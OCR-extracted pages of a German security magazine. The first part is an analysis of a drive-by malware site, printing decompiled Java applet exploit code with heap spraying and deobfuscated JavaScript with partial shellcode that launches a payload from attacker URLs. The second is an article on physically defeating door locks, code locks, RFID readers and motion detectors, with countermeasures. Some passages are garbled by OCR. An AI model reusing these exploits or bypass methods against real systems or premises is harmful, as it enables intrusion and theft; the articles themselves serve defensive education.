/* using windows ? no: return */<br />
localObject2 = System.getProperty("os.name").<br />
toLowerCase();<br />
if (((String)localObject2).indexOf("win") >= 0)<br />
localObject1 = repeat('/', 302);<br />
else<br />
return;<br />
/* the core of the vulnerable: create a malicious url<br />
<strong>and</strong> ask java's midiplayer to play<br />
*/<br />
localObject1 = �������� + (String)localObject1 +<br />
"Z%Z%Z%Z%Z%Z%";<br />
try<br />
Zusätzlich wird noch das oben erwähnte verschleierte<br />
JavaScript auf der ursprünglichen HTML Seite geladen.<br />
Dieses ist noch erstaunlicher, denn es enthält gleich eine<br />
ganze Ladung von Exploits für Java, Adobe Flash<br />
sowie Adobes <strong>PDF</strong> Reader bereit. Der ‚Author‘ der Seite<br />
war auf höchste Kompatibilität aus, denn auch hier<br />
werden nur bestimmte – vor allem neuere – Versionen<br />
der Browser Plugins unterstützt (vgl. Listing 5.).<br />
Unter "http://www.exploit-db.com/exploits/12117/" findet<br />
man eine Beschreibung der Schwachstelle. Diese<br />
betrifft zusätzlich zum analysierten Applet die Java Version<br />
1.6.0_19.<br />
FORTGESCHRITTENE<br />
{<br />
String str19 = url + "11";<br />
localObject4 = "";<br />
for (int k = 0; k < str19.length(); k++)<br />
{<br />
localObject4 = (String)localObject4 + Integer.<br />
toHexString(str19.charAt(k));<br />
}<br />
while (((String)localObject4).length() % 8 != 0)<br />
{<br />
localObject4 = (String)localObject4 + "26"; /* 0x26 =<br />
'&' */<br />
}<br />
localObject4 = str2 + (String)localObject4;<br />
this.mem = spray((String)localObject4, str10);<br />
localObject5 = new URL((String)localObject1);<br />
MidiSystem.getSequencer();<br />
str21 = "";<br />
MidiSystem.getSoundbank((URL)localObject5); /*
Malware-Doppelschlag per JavaScript und JavaApplet<br />
Listing 5. Codefragment des entschleierten JavaScript<br />
verdeutlicht das Potential:<br />
var fdata;<br />
var skd='%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%<br />
ued83% ... %u6870%u0070';<br />
var skd1=skd + '%u7468%u7074% ... %u0038%u9000';<br />
var skd2=skd + '%u7468%u7074% ... %u0032%u9000';<br />
function JAVASMB() {<br />
try {<br />
/* see http://www.exploit-db.com/exploits/12117/ for<br />
exploit description */<br />
var u = 'HTTP: -J-jar -J\\bittoram.com\smb\old.<br />
avi http://arestyute.com/<br />
sadhbdsa879321jbdas/l.php?i=2<br />
none';<br />
if (window.navigator.appName == 'Microsoft Internet<br />
Explorer') {<br />
try {<br />
var o = document.createElement('OBJECT');<br />
o.classid = 'clsid:CAFEEFAC-DEC7-0000-0000-<br />
ABCDEFFEDCBA';<br />
o.launch(u);<br />
} catch (e) {<br />
var o2 = document.createElement('OBJECT');<br />
o2.classid = 'clsid:8AD9C840-044E-11D1-B3E9-<br />
00805F499D93';<br />
o2.launch(u);<br />
}<br />
das Verbieten von JavaScript 3 , was moderne, Ajaxbasierte<br />
Internetseiten nahezu unbenutzbar macht,<br />
hätte auf das Laden des Java Applets keine Auswirkung.<br />
Wie kann man derartigen heterogenen Bedrohungen<br />
begegnen? Das häufigste Einfallstor für Schadsoftware<br />
bleibt die E-Mail. Also ist die Absicherung<br />
der E-Mail-Kommunikation der erste und wichtigste<br />
Schritt zur Sicherung des Systems. Moderne Anti-Spam<br />
und Anti-Virenprogramme sind in der Lage<br />
Massenmails mit gefährlichen Anhängen zu erken-<br />
��� ����������������������������������������������������������<br />
������������������<br />
��� ���������������������������������������������������������<br />
��������������� ����� ������ ������� ��� ������������ ����<br />
���������� ���� ��������� ���� ����������� ���� �����������<br />
����������� ����� ������ ����� ���� ��������� ����� ����������<br />
����������������������������������������������������������<br />
��������������������������������������������������������<br />
���������������������������������������������������������<br />
��������������������������������������������������������<br />
���� ����������� ���������� �������� �������� http://de-<br />
.wikipedia.org/wiki/Java_Virtual_Machine<br />
��� ���������������������������������������������������������<br />
fox.<br />
} else {<br />
var o = document.createElement('OBJECT');<br />
var n = document.createElement('OBJECT');<br />
o.type = 'application/npruntime-scriptableplugin;deploymenttoolkit';<br />
n.type = 'application/java-deployment-toolkit';<br />
document.body.appendChild(o);<br />
document.body.appendChild(n);<br />
try {<br />
o.launch(u);<br />
} catch (e) {<br />
n.launch(u);<br />
}<br />
}<br />
} catch (e) {<br />
IEPEERS();<br />
}<br />
IEPEERS();<br />
}<br />
...<br />
JAVASMB();<br />
nen, bevor entsprechende Signaturen bereitstehen.<br />
Weiterhin sollte der ausgehende E-Mail-Verkehr mit<br />
gleicher Sorgfalt auf Spam und Viren geprüft werden<br />
wie der eingehende. Nur so kann man feststellen,<br />
ob man bereits ungewollt zum Spam- und Virenversender<br />
geworden ist. Am besten funktioniert dies<br />
mit einer ausgelagerten E-Mail-Sicherheitslösung, da<br />
der Anbieter meist von der Masse der empfangenen<br />
und analysierten E-Mails profitiert, sprich Bedrohungen<br />
meist schneller erkennt <strong>als</strong> der einzeln agierende<br />
Mail-Server-Administrator. Und letzen Endes gilt<br />
immer noch: Öffnen Sie keine E-Mails oder Anhänge<br />
von Unbekannten.<br />
MICHAEL PEICK<br />
Entwickler und Mitglied des eleven Research Teams<br />
hakin9.org/de 15
Penetration Testing im Jahre 2010<br />
Penetration Testing<br />
im Jahre 2010<br />
Dimitri Roschkowski<br />
Viele Administratoren übersehen leider bei der Absicherung<br />
des Netzwerkes seine physikalische Sicherheit. Die<br />
Bedrohung kommt nicht nur durch das Ethernet-Kabel.<br />
IN DIESEM ARTIKEL ERFAHREN SIE...<br />
�� ���� �������� �������� �������� ������������������� �����������<br />
werden können<br />
�� �������������������������������������<br />
Im Jahr 2010 ist es kein Problem mehr, ein Netzwerk<br />
vor Gefahren zu schützen. Firewall-Hardware gibt es<br />
mittlerweile zu erschwinglichen Preisen. IT-Systemhäuser<br />
holen sich Sicherheitsexperten und richten mit<br />
deren Unterstützung ein sicheres Netzwerk ein. Mitarbeiter<br />
werden im Umgang mit der IT-Technik geschult,<br />
sodass Phishing und Social Engineering Angriffe erfolglos<br />
verlaufen. IDS und IPS Systeme finden verdächtige<br />
Aktivitäten im Netzwerk und zeigen diese dem Administrator<br />
an. Die IEEE 802.1X Authentifizierung an Access<br />
Points und Netzwerkswitches verhindern den Zugang<br />
von unbekannten Computern zum Netzwerk. Mit IEEE<br />
802.1Q (Virtual Local Area Network oder kurz VLAN)<br />
werden Netzwerke segmentiert, obwohl alle Computer<br />
hardwareseitig an einem Switch hängen. Mit diesen<br />
Techniken ist man in der Lage ein Netzwerk sowohl vor<br />
Angriffen aus dem WAN <strong>als</strong> auch aus dem Inneren LAN<br />
zu schützen – würde man meinen.<br />
Die Realität<br />
Ich wurde von einem mittelständischen Unternehmen<br />
engagiert einen Penetrationstest durchzuführen. Während<br />
der Footprinting-Phase habe ich sehr schnell erkannt,<br />
dass die IT-Sicherheit bei diesem Unternehmen<br />
ein sehr sensibles Thema ist. Doch trotz fast paranoider<br />
Sicherheitsvorkehrungen, ist es mir erfolgreich gelungen,<br />
dem Unternehmen die Kundendaten zu entwenden.<br />
Zwar war IT-Technisch alles abgesichert, der physische<br />
Zugang zu den Daten war es allerdings nicht.<br />
Die Eingangstür des Unternehmens war wegen des<br />
WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...<br />
�� ���������������������������������������������<br />
Kundenverkehrs nicht abgeschlossen. Die Tür zum<br />
Serverraum st<strong>and</strong> wohl wegen der Abwärme sperrangelweit<br />
offen, im Schloss des Racks steckte der Schlüssel.<br />
Es gab nichts und niem<strong>and</strong>en, der mich davor abhalten<br />
konnte, aus jedem Server jeweils eine Festplatte<br />
einzustecken und blitzschnell das Gelände zu verlassen.<br />
Weder der Geschäftsführer noch die IT-Administration<br />
hat mit einem so dreisten und einfachen Angriff<br />
gerechnet.<br />
In dem folgenden Artikel werde ich die aktuelle Sicherheitstechnik<br />
vorstellen und aufzeigen, wie einfach<br />
diese Technik zerstörungsfrei mit und fast spurlos<br />
überlistet werden kann. Dieser Artikel ist keine Anleitung,<br />
wie man einbricht, er soll lediglich die Schwachstellen<br />
der heute massenhaft eingesetzten Systeme<br />
aufzeigen. Aus diesem Grund habe ich mich bei den<br />
Beschreibungen kurz gefasst sowie einige Details<br />
weggelassen.<br />
Zugefallene Türen<br />
Was ist eigentlich eine zugefallene Tür? Rund 95% aller<br />
Türen haben heute ein Schloss mit einer Falle. Wird<br />
die Tür zugezogen, fällt die Schlossfalle in die dafür<br />
vorgesehene Öffnung des Schließbleches in der Türzarge.<br />
Die Tür lässt sich dann entweder mit dem Türgriff<br />
oder durch das drehen des Schließzylinders wieder<br />
öffnen (wenn z.B. auf einer Seite ein Knauf statt eines<br />
Angriffes angebracht ist). Mit dem Schlüssel reicht eine<br />
halbe Umdrehung aus, um die Tür wieder zu öffnen.<br />
Bei elektronischen Schließsystemen erfolgt die Freiga-<br />
hakin9.org/de 17
18<br />
be dabei nicht an der Schlossfalle freigegeben, sondern<br />
am Schließblech.<br />
Wie lässt sich eine zugefallene Tür öffnen?<br />
Zugefallene Türen lassen sich ganz einfach öffnen. Schlüsseldienste<br />
verwenden hierfür Öffnungsnadeln. (Abbildung<br />
1.) Diese Öffnungsnadeln werden in Höhe der Schlossfalle<br />
zwischen Türzarge und Türblatt angesetzt, zieht man jetzt<br />
den hinteren Teil der Öffnungsnadel nach oben, drückt der<br />
vordere Teil die Schließfalle wieder ins Schloss zurück – die<br />
Tür ist damit offen. Mit etwas Übung dauert es nicht länger<br />
<strong>als</strong> fünf Sekunden, um eine Tür zu öffnen.<br />
Abbildung 1. Zwei Sätze Öffnungsnadeln<br />
Abbildung 2. Eine Öffnungsnadel an einer Doppelfalztür<br />
PRAXIS<br />
Um so etwas zu verhindern, bieten sich sogenannte<br />
Doppelfalztüren an. (Abbildung 2.) Diese Türen haben<br />
einen zweiten Knick im Rahmen und Türblatt. Eine angesetzte<br />
Öffnungsnadel kommt damit nicht mehr an die<br />
Schließfalle ran und eine Öffnung wird damit verhindert.<br />
Mit einer sogenannten „Mach Auf“ Faltkarte lässt sich<br />
aber auch dieses Hindernis überwinden.<br />
Damit eine Tür mit diesen Techniken nicht geöffnet<br />
werden kann, hilft es nur diese Tür abzuschließen.<br />
Dabei wird mindestens ein Riegel in das Schließblech<br />
geschoben, der ohne Schlüssel nicht mehr zurückgeschoben<br />
werden kann. Das Abschließen einer Tür mit<br />
Schlüssel ist jedoch nicht komfortabel. Diese Schwäche<br />
haben die Schlosshersteller erkannt und bieten<br />
selbstschließende Schlösser an. Diese Schlösser<br />
schieben automatisch beim zufallen die Riegel<br />
in das Schließblech. Betätigt man die Türklinke, wird<br />
gleichzeitig die Schlossfalle und die Riegel zurückgeschoben,<br />
die Tür ist wieder offen. Je nach Modell des<br />
Schlosses braucht man aber weiterhin eine bis zwei<br />
Umdrehungen mit dem Schlüssel, um diese Tür zu öffnen.<br />
Diese Schlösser sind allerdings nicht für Türen geeignet,<br />
die über eine Elektronik geöffnet werden sollen.<br />
Hierfür gibt es allerdings auch eine Lösung. Es<br />
gibt Schlösser mit einer Elektronik und einem Elektromotor,<br />
der dann bei einem entsprechenden Signal<br />
das Schloss aufschließt und damit die Funktion eines<br />
Schlüssels simuliert. Allerdings sind solche Schlösser<br />
recht teuer.<br />
Lockpicking – Der Zylinder <strong>als</strong> Angriffsziel<br />
Eine weitere Schwachstelle einer Tür ist der Zylinder.<br />
Ein Laie kann nicht erkennen, ob die Mechanik eines<br />
Zylinders sicher ist oder mit entsprechendem Werkzeug<br />
sekundenschnell überlistet werden kann. Für ihn zählt<br />
lediglich der Preis und die Logos auf der Verpackung,<br />
um die Sicherheit beurteilen zu können. Hier gilt allerdings<br />
ausnahmsweise der Grundsatz: billig = schlecht,<br />
teuer = gut, wobei man dazu anmerken muss, dass<br />
man die oberste Preiskategorie der Zylinder wählen<br />
muss, um tatsächlich eine hohe Sicherheitsstufe herstellen<br />
zu können. Dass man Zylinder öffnen kann, liegt<br />
an der (Massen-)Herstellung dieser mechanischen Geräte.<br />
Jedes Produkt weist gewisse Toleranzen auf, je<br />
größer diese Toleranzen sind, desto leichter lässt sich<br />
der Zylinder überlisten.<br />
Wie Funktioniert ein Schließzylinder?<br />
Ein Schließzylinder besteht aus einem Gehäuse (hellgrau)<br />
und einem Kern (dunkelgrau). Kernstifte (gelb)<br />
und Gehäusestifte (rot) verhindern, dass der Kern gedreht<br />
werden kann. Führt man nun einen Schlüssel in<br />
den Schließkanal (weiß) ein, drücken die Zähne des<br />
Schlüssels die Kernstifte herunter sodass der Übergang<br />
zwischen den Kernstiften und den Gehäusestif-<br />
10/2010
ten genau zwischen dem Kern und dem Gehäuse ist.<br />
In diesem Zust<strong>and</strong> lässt sich der Kern drehen und ein<br />
Schloss aufschließen.<br />
Ich möchte hier drei Methoden vorstellen, mit denen<br />
ein Schließzylinder ohne Schlüssel zerstörungsfrei geöffnet<br />
werden kann. Beim klassischen H<strong>and</strong>picken geht<br />
es darum, die Sperrstifte eines Schlosses so zu manipulieren,<br />
dass diese den Kern freigeben. Zunächst wird<br />
ein Spanner in den Schließkanal eingeführt und um ein<br />
paar Grad gedreht, sodass ein minimaler Drehmoment<br />
auf die Sperrstifte wirkt. Geht man jetzt mit einem H<strong>and</strong>pick<br />
die einzelnen Sperrstifte ab, so lässt sich mit etwas<br />
Übung erfühlen, welcher Stift gerade am meisten Widerst<strong>and</strong><br />
bietet. Drückt man diesen Stift mit dem H<strong>and</strong>pick<br />
herunter, lässt sich der Kern ein kleines bisschen<br />
drehen, sobald der der Gehäusestift den Kern verlassen<br />
hat. Diesen Stift hat man jetzt gesetzt. Nun sperrt<br />
ein <strong>and</strong>erer Sperrstift. In einem normalen Schloss gibt<br />
es etwa fünf solcher Stifte. Hat man alle Stifte richtig<br />
gesetzt, lässt sich der Kern drehen ist der Zylinder ist<br />
damit geöffnet.<br />
Eine weitere Methode um einen Schließzylinder zu<br />
öffnen sind Schlagschlüssel. Ein Schlagschlüssel ist<br />
ein spezieller aus Stahl gefertigter Schlüssel, der nur im<br />
Profil in einen Zylinder passt. Die Zähne des Schlüssels<br />
wurden auf die tiefst mögliche Position gefräst, außerdem<br />
wurde der Anschlag des Schlüssels um etwa einen<br />
Millimeter verkürzt, sodass der Schlüssel sich mit<br />
leichtem Druck etwas tiefer ins Schloss einführen lässt<br />
<strong>als</strong> vorgesehen. Zum Öffnen des Zylinders führt man<br />
den Schlagschlüssel in den Zylinder ein und schlägt anschließend<br />
mit einem flexiblen Hammer auf den Schlüssel.<br />
Den Schlagimpuls übertragen die Kernstifte auf die<br />
Gehäusestifte, die dann nach unten gedrängt werden<br />
und damit den Kern freigeben. Dreht man den Schlagschlüssel<br />
genau in diesem Moment (wenige Millisekunden<br />
nach dem Schlag), lässt sich der Kern drehen und<br />
das Schloss öffnen.<br />
Die dritte Methode ist ein Elektro-Pick. Ein Elektropick<br />
arbeitet nach dem gleichen Prinzip, wie ein<br />
Schlagschlüssel, nur dass hier mehrere Schläge pro<br />
Sekunde auf die Sperrstifte erfolgen. Um einen Zylinder<br />
mit dieser Methode zu öffnen, führt man die Nadel<br />
des Elektro-Picks sowie einen Spanner (entweder<br />
einen normalen oder einen Drehspanner) in den<br />
Schließkanal ein und schaltet den Pick ein. Anstatt<br />
den Pick durchgehend laufen zu lassen, empfiehlt es<br />
sich ihn in kurzen Sequenzen ein- und auszuschalten.<br />
Sind die Sperrstifte in passender Position, lässt sich<br />
der Kern drehen.<br />
Bei allen drei vorgestellten Öffnungsmethoden hat<br />
man bei abgeschlossenen Schlössern immer ein Problem.<br />
Hat man einen Zylinder um 360° gedreht, drücken<br />
die Federn die Gehäusestifte wieder in den Kern<br />
und man müsste den Zylinder erneut öffnen (picken).<br />
Um das zu verhindern – und damit stelle ich das letz-<br />
Penetration Testing im Jahre 2010<br />
te Werkzeug meiner Sammlung vor – benutzt man das<br />
„Flip-It“ Werkzeug. Dieses Werkzeug nutzt die physikalische<br />
Trägheit aus, indem der Zylinder so schnell dreht<br />
wird, dass die Federn es nicht schaffen, die Stifte in den<br />
Kern zu drücken. Dazu spannt man den „Flip-It“ erst<br />
einmal in der Richtung vor, in der der Zylinder gedreht<br />
werden soll, dann führt man es in den Schließkanal ein<br />
und drückt den Auslöser. Der Zylinder wird dann über<br />
die oberste Position gedreht und man kann das Schloss<br />
weiter öffnen.<br />
Man benötigt viel Übung, um einen Zylinder ohne<br />
Schlüssel öffnen zu können. Denn macht man es mit<br />
Gewalt, kann die Mechanik im inneren beschädigt werden.<br />
Dann lässt sich das Schloss nicht einmal mit dem<br />
richtigen Schlüssel öffnen.<br />
Sichere Schließzylinder<br />
Sichere Schließzylinder gibt es in meinen Augen nicht.<br />
Je nachdem welchen Aufw<strong>and</strong> und Kosten man auf sich<br />
nimmt, wird man in der Lage sein, alle Zylinder zu umgehen.<br />
Einen aus meiner Sicht relativ sicheren Zylinder<br />
bietet die Firma EVVA mit dem MCS (Magnet Code<br />
System) an. Statt normaler Stifte arbeitet dieser Zylinder<br />
mit insgesamt acht Magnetrotoren. Wird ein Schlüs-<br />
Abbildung 3. Ein Schließzylinder im Querschnitt. Links ist der<br />
Zylinder abgeschlossen, rechts offen (Bildquelle: Wikipedia.de)<br />
Abbildung 4. Werkzeugsatz zur zerstörungsfreien Öffnung von<br />
Schlössern<br />
hakin9.org/de 19
20<br />
Abbildung 5. Ein EVVA-MCS Schlüssel<br />
Abbildung 6. Ein Elektronisches Codeschloss an einer<br />
Gegensprechanlage<br />
PRAXIS<br />
sel mit richtiger Magnet-Codierung eingeführt, werden<br />
die Rotoren in die Schließposition gebracht und der<br />
Zylinder lässt sich drehen. Zusätzlich kann ein solcher<br />
Zylinder mit einer Elektronik auf RFID Basis ausgestattet<br />
werden. Zusätzlich zum Magnetcode wird noch eine<br />
elektronische Authentifizierung durchgeführt, bevor<br />
dieser Zylinder trotz des richtigen Schlüssels gedreht<br />
werden kann. So können z.B. verlorene Schlüssel gesperrt<br />
werden oder um Mitarbeitern den Zutritt nur zu<br />
bestimmten Zeiten zu gestatten.<br />
Codeschlösser<br />
Codeschlösser sind in der Regel zugefallene Türen und<br />
lassen sich am einfachsten mit den bereits oben vorgestellten<br />
Methoden öffnen. In diesem Artikel möchte<br />
ich aber auf eine weitere Schwachstelle hinweisen. Die<br />
Abbildung 5. zeigt ein typisches Codeschloss, anh<strong>and</strong><br />
des Zylinders auf der rechten Seite kann jeder darauf<br />
schließen, wie groß die Code-Tasten dieses Schlosses<br />
in der Realität sind. Würde man eine Codeeingabe filmen,<br />
könnte man anh<strong>and</strong> der langen H<strong>and</strong>bewegungen<br />
auf den Code schließen können.<br />
Diese Schwachstelle lässt sich aber ganz einfach<br />
schließen, indem man den Eingabetasten die Ziffern für<br />
jede Codeeingabe per Zufallsgenerator zuweist. Das<br />
bedeutet, dass die obere linke Taste nicht permanent<br />
die Ziffer 1 eingibt, sondern bei jeder Codeeingabe eine<br />
<strong>and</strong>ere. Durch diese zufällige Anordnung der Ziffern<br />
auf den Tasten lässt sich nicht mehr anh<strong>and</strong> der<br />
H<strong>and</strong>bewegung feststellen, welche Ziffer eingegeben<br />
wurde. Umsätzen lässt sich eine solche Eingabetechnik<br />
mit Siebensegmentanzeigen oder mini-OLED-Bildschirmen<br />
unter durchsichtigen Tasten bzw. mit einem<br />
Touchscreen.<br />
In Indoor-Bereich trifft man vor einigen Räumen auf<br />
eine einfachere Version von Codeschlössern. Bei diesen<br />
Schlössern liegt das Eingabeterminal direkt am<br />
Schloss an, die Energieversorgung erfolgt über Batterien.<br />
Im geschlossenen Zust<strong>and</strong> lässt sich die Türklinke<br />
ohne Funktion herunterdrücken. Gibt man den<br />
richtigen Code ein, wird ein Elektromagnet mit Strom<br />
versorgt und Zieht einen Stift an, der die Türklinke mit<br />
dem Schloss verbunden. Betätigt man jetzt die Türklinke,<br />
so lässt sich die Tür öffnen. Da die Batterien in einem<br />
solchen Schloss möglichst lange halten sollen,<br />
arbeiten die Schlösser mit einem recht geringen Magnetfeld.<br />
Dieses Magnetfeld kann man jedoch mit einem<br />
von außen angebrachten starken Magneten (siehe<br />
auch Abschnitt über Reed-Relais) simulieren und so<br />
das Schloss öffnen. Im Übrigen lassen sich mit einem<br />
starken Magneten auch einige ältere elektronische Zylinder<br />
öffnen.<br />
Schließsysteme mit RFID-Tags<br />
RFID steht für radio frequency identification, <strong>als</strong>o<br />
für die Identifikation über Funkwellen. Diese Technik<br />
10/2010
ist heute sowohl bei Unternehmen, <strong>als</strong> auch in Privathäusern<br />
(Autoschlüssel, Funk-Garagentoröffner)<br />
sehr verbreitet und wegen des Komforts beliebt. Im<br />
Wesentlichen besteht das System aus zwei Komponenten,<br />
einem RFID Lesegerät und den sogenannten<br />
Tags. Mit den Tags können sich die Zugangsberechtigten<br />
Personen am Lesegerät identifizieren. Unabhängig<br />
davon, ob das Tag aktiv (mit einer eigenen<br />
Energieversorgung) oder passiv (die notwendige<br />
Energie liefert das Lesegerät) ist, wird der Identifikationsvorgang<br />
vom Tag eingeleitet. In den einfachsten<br />
Fällen sendet das Tag unverschlüsselt die eigene<br />
Seriennummer oder einen vorher eingespeicherten<br />
Code, das Lesegerät empfängt den Code und<br />
überprüft ob die Seriennummer oder der Code zugangsberechtigt<br />
ist. In den wenigsten Fällen erfolgt<br />
eine zusätzliche Kryptographische Authentifizierung<br />
des Tags, die aber wegen der geringen Rechenkapazität<br />
und Energieversorgung sehr einfach ausfällt.<br />
Wie kann man solche Systeme überlisten?<br />
Das Zauberwort dazu lautet „Software Defined Radio“<br />
(SDR). Mit einem SDR Tranceiver ist man in der<br />
Lage, die Kommunikation zwischen dem Tag und<br />
dem Lesegerät aufzuzeichnen und auf einem Rechner<br />
zu analysieren. Anschließend sendet man die<br />
aufgezeichneten und eventuell bearbeiteten Daten<br />
an das Lesegerät.<br />
Wie läuft ein solcher Angriff ab?<br />
Zunächst einmal muss man herausfinden, auf welcher<br />
Frequenz die Kommunikation zwischen dem Lesegerät<br />
und den Tags erfolgt. Dazu kann man über<br />
den Herstellernamen des Lesegerätes und seinem<br />
Produkt-Portfolio gehen oder einfach verschiedene<br />
Tags ausprobieren. Wenn ein Tag mit dem eingesetzten<br />
Lesegerät nicht kompatibel ist, erfolgt keine<br />
Reaktion. Wird dem Tag der Zugang verweigert, so<br />
zeigt das Lesegerät dies in der Regel an. Dann wird<br />
ein SRD Tranceiver benötigt, der auf der benötigten<br />
Frequenz arbeitet. Dazu verwende ich den USRP/<br />
USRP2 Tranceiver mit einem passenden Daughterboard<br />
und einer Richtantenne (700$/1.400$ + 275$<br />
+ 100$). Der Vorteil dieses Univers<strong>als</strong>ystems liegt<br />
daran, dass man mit verschiedenen Daughterboard<br />
unterschiedliche Frequenzen abdecken kann. Die<br />
Richtantenne richtet man dann etwas seitlich auf das<br />
Lesegerät aus und fängt mit der Aufzeichnung der<br />
Daten in dem Frequenzbereich an. Bei Long Range<br />
Tags (das Tag kann mehrere Meter vom Lesegerät<br />
entfernt sein) reicht bei Unverschlüsselten Systemen<br />
- wegen der höheren Sendestärke - die Aufzeichnung<br />
einer Kommunikation aus. Passive Tags, wie RFID<br />
Karten, senden ein viel schwächeres Signal, deshalb<br />
sind die Aufzeichnungen oft gestört. In der Regel benötigt<br />
man fünf bis zehn Aufzeichnungen um ein Mus-<br />
Penetration Testing im Jahre 2010<br />
Abbildung 7. Das Lesegerät reagiert auf eine Mifare-Classic Karte<br />
und lehnt den Zugang ab<br />
Abbildung 8. Eine Überwachungskamera hat eine Veränderung<br />
im Bild detektiert. Der veränderte Bildausschnitt wird in einem<br />
Rahmen angezeigt.<br />
hakin9.org/de 21
22<br />
ter zu finden. Der Anfang der Übertragung ist immer<br />
gleich, in der Mitte gibt es einen variablen Bereich<br />
und das Ende ist bei allen Aufzeichnungen ebenfalls<br />
gleich. Damit ein Lesegerät nun dem virtuellen Tag<br />
den Zugang gewährt, säubert man zunächst einmal<br />
die Aufzeichnungen mit einigen Filtern. GNU-Radio<br />
bietet hierfür zahlreiche Möglichkeiten. Dann stellt<br />
man sich aus mehreren Aufzeichnungen ca. drei<br />
möglichst ideale (hier braucht man etwas Erfahrung,<br />
ein gutes Auge und etwas Fingerspitzengefühl) Kommunikationen<br />
zusammen und sendet diese an das<br />
Lesegerät. Mindestens eine dieser Aufzeichnungen<br />
wird dann das Lesegerät akzeptieren und dem Angreifer<br />
den Zugang gewähren.<br />
Aus der Praxis kann ich sagen, dass etwa 90% aller<br />
RFID-Karten-Systeme sich nur mit der Seriennummer<br />
des Tags zufrieden geben. Ältere Garagentoröffner<br />
arbeiten mit einem statischen Code. Neuere<br />
Garagentoröffner und einige Autohersteller nutzen einen<br />
Rolling Code, um den Nutzer zu identifizieren. Im<br />
März 2008 wurde auch dieses System von Forschern<br />
der Ruhr-Universität Bochum geknackt. Zwei aufgezeichnete<br />
Kommunikationen genügen bereits für eine<br />
Seitenkanalattacke. Ebenfalls wurde im Jahr 2008<br />
die Verschlüsselung des Mifare-Systems per Reverse<br />
Engineering geknackt. Solche Verschlüsslungen<br />
verlangsamen nur den Angriff und machen ihn teurer.<br />
Gibt es auch sichere RFID-Systeme?<br />
Die gibt es durchaus. Hier verwendet man eine<br />
asymmetrische Verschlüsselung. Für jedes zugangs-<br />
Magnete sind kein Spielzeug<br />
�����������������������������������������������������<br />
���������� ��������� ������� ���� ��������� ����������� ������<br />
���� ������������� ��� ������������� ������������� ��������<br />
���������������������������������������������������������<br />
���������������������������������������������������������<br />
����������������������������������������������������������<br />
�����������������������������������������������������<br />
Abbildung 9. Eine Büroklammer ist an einer Schnurr befestigt.<br />
Selbst bei einem Abst<strong>and</strong> von 35cm ist das Magnetfeld noch so<br />
stark, dass die Büroklammer in der Luft hängt.<br />
PRAXIS<br />
berechtigte Tag wird ein privater und ein öffentlicher<br />
Schlüssel erzeugt. Der private Schlüssel wird in einer<br />
Datenbank gespeichert, auf die das Lesegerät zugreifen<br />
kann. Der öffentliche Schlüssel wird auf dem<br />
Tag gespeichert. Die Identifizierung erfolgt dann in<br />
mehreren Schritten. Wie oben bereits beschrieben,<br />
fängt das Tag mit der Identifikation an, indem es dem<br />
Lesegerät seine Seriennummer mitteilt. Das Lesegerät<br />
generiert daraufhin eine Zufallszahl und sendet<br />
diese mit der Seriennummer des Tags wieder zurück.<br />
(Da die Kommunikation über Funk erfolgt, kann es<br />
sein, dass zur gleichen Zeit mehrere RFID Tags aktiv<br />
sind. Deshalb muss man während der Kommunikation<br />
stets angeben, für welchen Empfänger eine Nachricht<br />
bestimmt ist.) Das Tag empfängt die Nachricht,<br />
verschlüsselt diese mit dem öffentlichen Schlüssel<br />
und sendet sie an das Lesegerät zurück. Kann das<br />
Lesegerät die empfangene Nachricht mit dem privaten<br />
Schlüssel des Tags entschlüsseln und stimmt die<br />
Nachricht mit der Zufallszahl überein, wird der Zugang<br />
gewährt.<br />
Bewegungsmelder<br />
Bewegungsmelder verwenden für die Bewegungsdetektion<br />
Passiv Infrarot Sensoren (PIR). Jedes Objekt<br />
emittiert eine Wärmestrahlung, ein PIR Sensor kann<br />
diese Strahlung messen. Um Bewegungen detektieren<br />
zu können, wird der Sensor mit Bündellinsen in Bereiche<br />
aufgeteilt. Ändert sich die einfallende Strahlung<br />
in einem Bereich um einen bestimmten Schwellwert,<br />
wird dies <strong>als</strong> Bewegung interpretiert. Der Schwellwert<br />
sorgt außerdem dafür, dass statische Temperaturveränderungen<br />
der Umgebung nicht <strong>als</strong> Bewegung gedeutet<br />
werden. Diese Funktionsweise ist leider Fehleranfällig,<br />
so kann z.B. ein kalter Luftstrom bereits einen<br />
Bewegungsmelder auslösen. Hierfür setzen bessere<br />
Bewegungsmelder (Dualmelder) zusätzlich noch einen<br />
Ultraschall-Sensor ein. Nur wenn beide Sensoren<br />
auslösen, wird eine Bewegung gemeldet. Damit sollen<br />
Fehlalarme verhindert werden. VdS-Anerkannte<br />
Bewegungsmelder, die in Alarmanlagen verwendet<br />
werden, lösen zusätzlich Alarm aus, wenn diese abgedeckt<br />
werden.<br />
Wie kann man Bewegungsmelder überlisten?<br />
Je größer die Entfernung zu dem PIR Sensor ist, desto<br />
weniger nimmt eine Veränderung Einfluss auf die<br />
einfallende Infrarotstrahlung in einem Bereich. Auch<br />
haben Gegenstände mit gleicher Wärmestrahlung keinen<br />
Einfluss auf die Sensoren. Einen Bewegungsmelder<br />
(auch einen Dualmelder) kann man deshalb mit einem<br />
Tuch überlisten. Zunächst lässt man das Tuch im<br />
überwachten Raum einige Minuten liegen, damit es die<br />
Temperatur der Umgebung annimmt. Wenn man sich<br />
jetzt in dieses Tuch einhüllt und seitwärts mit dem Rücken<br />
zum Bewegungsmelder langsam an diesem vor-<br />
10/2010
eigeht, wird keine Bewegung angezeigt. Zwar merkt<br />
bei einem Dualmelder der Ultraschall-Sensor die Bewegung,<br />
da jedoch der Infrarot Sensor keine Bewegung<br />
meldet, findet keine Alarmierung statt. Würde<br />
man dieses Tuch etwa 30cm vor dem Bewegungsmelder<br />
aufspannen, würde man den Bewegungsmelder<br />
außer Funktion setzen. Auch eine Abdeckerkennung<br />
würde hier nicht auslösen, da diese in der Regel bis<br />
20cm funktioniert.<br />
Gibt es Alternativen?<br />
Sicherlich gibt es sie. Zunächst einmal gibt es Bewegungsmelder,<br />
die auf Basis von Radarstrahlung funktionieren.<br />
Diese aktiven Bewegungsmelder können<br />
verdeckt z.B. unter einer Tapete oder Abdeckplatte installiert<br />
werden. Dadurch ist ein solcher Bewegungsmeder<br />
sowohl optisch nicht wahrnehmbar <strong>als</strong> auch<br />
vor Sabotage und V<strong>and</strong>alismus geschützt. Ein solcher<br />
Bewegungsmelder arbeitet nach dem Dopplerprinzip<br />
und strahlt im 9GHz oder 24GHz-Mikrowellenbereich.<br />
